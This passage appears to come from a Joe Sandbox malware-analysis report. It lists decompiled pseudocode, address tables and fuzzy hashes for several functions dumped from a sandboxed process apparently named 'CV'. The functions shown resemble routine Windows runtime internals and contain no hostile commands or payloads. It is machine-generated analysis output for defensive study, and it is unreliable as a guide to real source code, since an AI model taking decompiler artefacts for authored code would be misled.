Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: B4519071600646EFDB1ACF18C580A56BBB9FF45308F18C0BAE9089F256E771E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01272990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01272990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x131ff00);
				E0129D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1221664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0128E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1221668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E012C51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x122166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01272AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01256600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01272C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01272AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01272C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01272ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0129D0D1(_t62);
				goto L28;
			}

0x01272990
0x01272992
0x01272997
0x012729a3
0x012729a6
0x012729ab
0x012729ad
0x012729b2
0x012b5c80
0x012729b8
0x012729b8
0x012729bb
0x012729c0
0x012729c5
0x012729c6
0x012729c6
0x012729cb
0x00000000
0x00000000
0x012729cd
0x012729d0
0x012729d9
0x012729db
0x012729dd
0x01272a7f
0x01272a84
0x01272a87
0x01272a89
0x012b5ca1
0x012b5ca3
0x00000000
0x01272a8f
0x01272a8f
0x00000000
0x01272a8f
0x00000000
0x012729e3
0x012729e3
0x012729e3
0x00000000
0x012729e3
0x012729dd
0x00000000
0x012729db
0x012729e6
0x012729e9
0x012729eb
0x012729ed
0x012729f3
0x012729f5
0x012729f8
0x012729fa
0x01272a97
0x01272a9a
0x01272a9d
0x01272add
0x00000000
0x01272a9f
0x01272aa2
0x01272aa5
0x01272aa8
0x01272aab
0x012b5cab
0x012b5caf
0x012b5cc5
0x012b5cda
0x012b5cdc
0x012b5cdf
0x012b5ce5
0x00000000
0x012b5ceb
0x012b5ced
0x012b5cee
0x00000000
0x012b5cee
0x012b5cb1
0x012b5cb4
0x012b5cb9
0x012b5cbb
0x00000000
0x012b5cbd
0x012b5cbd
0x00000000
0x012b5cbd
0x012b5cbb
0x01272ab1
0x01272ab1
0x01272ac4
0x01272ac6
0x01272ac6
0x00000000
0x01272ac6
0x01272aab
0x00000000
0x01272a00
0x01272a09
0x01272a0e
0x01272a21
0x01272a24
0x01272a35
0x01272a3a
0x01272a3d
0x01272a42
0x01272a59
0x01272a59
0x01272a5c
0x01272a5f
0x01272a5f
0x012729fa
0x012729f3
0x01272a64
0x01272a64
0x01272a6b
0x01272a6b
0x01272a6d
0x01272a72
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a0083836d156afa35146ffe395611f1769d7c5950f683f7632e3be476af403
Instruction ID: 2cf9e9c142000e14bbb5b228449bb4cefb63d7d36104770726f21438459b7f39
Opcode Fuzzy Hash: a0a0083836d156afa35146ffe395611f1769d7c5950f683f7632e3be476af403
Instruction Fuzzy Hash: A4516A7192021ADFDF25DF59C880AEFBBB6BF48350F158119EA14AB320D3759952CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01274D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01274D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x133d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0128FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1337bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0128B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01264620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0124CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0128B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0128F380(_t67 + 0xc, 0x1225138, 0x10) == 0) {
								 *0x13360d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01274F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01274E70(0x13386b0, 0x1275690, 0, 0) != 0) {
					_t46 = E0124CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x01274d3b
0x01274d4d
0x01274d53
0x01274d58
0x01274d65
0x01274d6c
0x01274d71
0x01274d77
0x01274d7f
0x01274d8c
0x01274d8e
0x01274dad
0x01274db0
0x01274db7
0x01274db8
0x01274db9
0x01274dba
0x01274dbb
0x01274dc1
0x01274dc8
0x01274dcc
0x01274dd5
0x01274dde
0x01274ddf
0x01274de0
0x01274de1
0x01274de6
0x01274de7
0x01274de9
0x01274df3
0x00000000
0x00000000
0x012b6c7c
0x012b6c8a
0x012b6c8a
0x012b6c9d
0x012b6ca7
0x012b6cac
0x012b6cb2
0x012b6cb9
0x00000000
0x012b6cbf
0x012b6cbf
0x00000000
0x012b6cbf
0x012b6cb9
0x01274dfb
0x012b6ccf
0x012b6cd3
0x01274e32
0x01274e39
0x012b6ce0
0x012b6cf2
0x012b6cf2
0x012b6ce0
0x01274e3f
0x01274e41
0x01274e51
0x01274e51
0x01274e03
0x01274e03
0x01274e09
0x01274e0f
0x01274e57
0x00000000
0x00000000
0x01274e1b
0x01274e30
0x01274e5b
0x01274e5b
0x00000000
0x01274e30
0x01274e11
0x01274e11
0x01274e16
0x00000000
0x01274e16
0x01274e01
0x00000000
0x01274e01
0x01274da5
0x012b6c6b
0x00000000
0x01274dab
0x01274dab
0x00000000
0x01274dab

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8d96cf10ec45ffd24701af2d285ee1732faf67f0ac586d812322495059f201
Instruction ID: 2e4827704f55156ea2df662e94431857a8954100875b3db97b038d33b7e6cc1c
Opcode Fuzzy Hash: 7a8d96cf10ec45ffd24701af2d285ee1732faf67f0ac586d812322495059f201
Instruction Fuzzy Hash: 11412A71A60359AFEB32EF18CC81FBBB7A9EB05724F000499EA4597281D7B4DD40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01274BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01274BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x133d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0124CC50(_t86);
					L11:
					return E0128B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1338504
				E01262280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0128FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0128B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01264620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0124CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1338504
								E0125FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01274F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x01274bad
0x01274bbf
0x01274bc2
0x01274bc6
0x01274bcd
0x01274bd9
0x012b67fe
0x012b6800
0x01274ccc
0x01274ccd
0x01274cb7
0x01274cc9
0x01274cc9
0x01274bdf
0x01274be5
0x00000000
0x00000000
0x01274beb
0x01274bef
0x00000000
0x00000000
0x01274bf5
0x01274bf9
0x01274c06
0x01274c0b
0x01274c17
0x01274c1c
0x01274c1f
0x01274c25
0x01274c33
0x01274c3d
0x01274c40
0x01274c43
0x01274c47
0x01274c4d
0x01274c53
0x01274c54
0x01274c55
0x01274c56
0x01274c5b
0x01274c5c
0x01274c63
0x01274c6b
0x00000000
0x00000000
0x012b6776
0x012b6784
0x012b6784
0x012b679f
0x012b67a7
0x012b67af
0x012b67ce
0x00000000
0x012b67b1
0x012b67b7
0x012b67b8
0x012b67c1
0x012b67d3
0x012b67d9
0x012b67dd
0x01274c94
0x01274c94
0x01274c98
0x01274c9c
0x01274ca3
0x012b67f4
0x012b67f4
0x01274cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x01274cb5
0x01274c79
0x01274c7e
0x01274c89
0x01274c8b
0x01274c8f
0x01274c8f
0x00000000
0x01274c89
0x012b67c3
0x00000000
0x012b67c3
0x012b67af
0x01274c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e641c50e359fc1ec53487358545a3a3f8b14e3d6b75e108a14ab57a8d713932
Instruction ID: f6adadb7956e6b7204d57048270196dde95566e83f413f89d6c0b2574f2e6556
Opcode Fuzzy Hash: 2e641c50e359fc1ec53487358545a3a3f8b14e3d6b75e108a14ab57a8d713932
Instruction Fuzzy Hash: 5441DB31A202699FDB25EF68C980FEE77B4EF45750F0100A9EA08AB241D774DE84CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01258A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01258A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x133d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0128B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0125E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1221180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01271DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01283C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01258999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x01258a0a
0x01258a1c
0x01258a23
0x01258a2e
0x01258a30
0x01258a36
0x01258a3c
0x01258a3e
0x01258a4a
0x01258a52
0x01258a9c
0x01258aae
0x01258a58
0x01258a5e
0x01258a6a
0x01258a6f
0x01258a75
0x01258a7d
0x01258a85
0x01258a86
0x01258a89
0x01258a93
0x01258a99
0x01258a9b
0x00000000
0x01258aaf
0x01258abe
0x01258ac3
0x01258acb
0x01258ad7
0x01258ae0
0x01258af1
0x00000000
0x01258af1
0x01258acd
0x01258ad5
0x01258afb
0x01258afd
0x01258aff
0x01258b07
0x01258b22
0x01258b24
0x01258b2a
0x01258b2e
0x01258b3f
0x01258b78
0x01258b41
0x01258b52
0x01258b54
0x01258b5c
0x01258b74
0x01258b74
0x01258b5c
0x01258b3f
0x01258b5e
0x01258b61
0x01258b64
0x01258b64
0x01258b6c
0x01258b6c
0x01258b11
0x012a9cd5
0x012a9cd5
0x01258b17
0x01258b1a
0x01258b1a
0x00000000
0x01258ad5
0x01258a89

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e85fbc6a94e8ed91d76baa25e7b78a28874a269f6e2bc84fecde561ba2b5df
Instruction ID: eddc96a87250132f49808d1c887937db790d576cc009b7191c31d15b23da696d
Opcode Fuzzy Hash: 05e85fbc6a94e8ed91d76baa25e7b78a28874a269f6e2bc84fecde561ba2b5df
Instruction Fuzzy Hash: D9415FB1A112299BDB64DF5AC8C8AB9B7F8FB54300F1045E9DD19D7252E7B09E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0130FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0130FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0130FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01310A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01267D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01301608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01312B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0130C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0130DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01267D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0130A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0130fde7
0x0130fde8
0x0130fdec
0x0130fdee
0x0130fdf5
0x0130fdf7
0x0130fdfc
0x0130fe19
0x0130fe22
0x0130fe26
0x0130fec6
0x0130fecd
0x0130fed5
0x0130fee7
0x0130fed7
0x0130fee0
0x0130fee0
0x0130feef
0x0130ff00
0x0130ff02
0x0130ff07
0x0130ff07
0x00000000
0x0130feef
0x0130fe33
0x0130fe55
0x0130fe59
0x0130fe5b
0x0130fe5e
0x0130fe69
0x0130fe6d
0x0130fe6d
0x0130fe69
0x0130fe35
0x0130fe41
0x0130fe41
0x0130fe79
0x0130fe8b
0x0130fe7b
0x0130fe84
0x0130fe84
0x0130fe93
0x00000000
0x0130fea8
0x0130feba
0x00000000
0x0130feba
0x0130fdfe
0x0130fe01
0x0130fe02
0x0130fe08
0x0130ff0c
0x0130ff14
0x0130ff14

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 5b0d2ef2a3e77cf77118cd90131e2a14477e7238d0983aa85b3ac658ba6b87f4
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: F93114322006456FE3339B6CC864F6BBBEDEBC5658F184558E94A8B7C2DA74EC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 0130EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0130EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01262280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0130E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0124F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0125FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0130AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0130BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01267D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E012FFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0125FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0130A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0130ea55
0x0130ea66
0x0130ea68
0x0130ea6c
0x0130ea6f
0x0130ea72
0x0130ea75
0x0130ea7a
0x0130ea7a
0x0130ea7e
0x0130ea80
0x0130ea85
0x0130ea8b
0x0130eab5
0x0130eabc
0x0130eabf
0x0130eabf
0x0130eaca
0x0130eace
0x0130ead0
0x0130eae4
0x0130eaeb
0x0130eaf0
0x0130eaf5
0x0130eb09
0x0130eb0d
0x0130eb1d
0x0130eb2d
0x0130eb38
0x0130eb3d
0x0130eb41
0x0130eb4a
0x0130eb60
0x0130eb4c
0x0130eb52
0x0130eb59
0x0130eb59
0x0130eb68
0x0130eb71
0x0130eb71
0x0130ea8d
0x0130ea8f
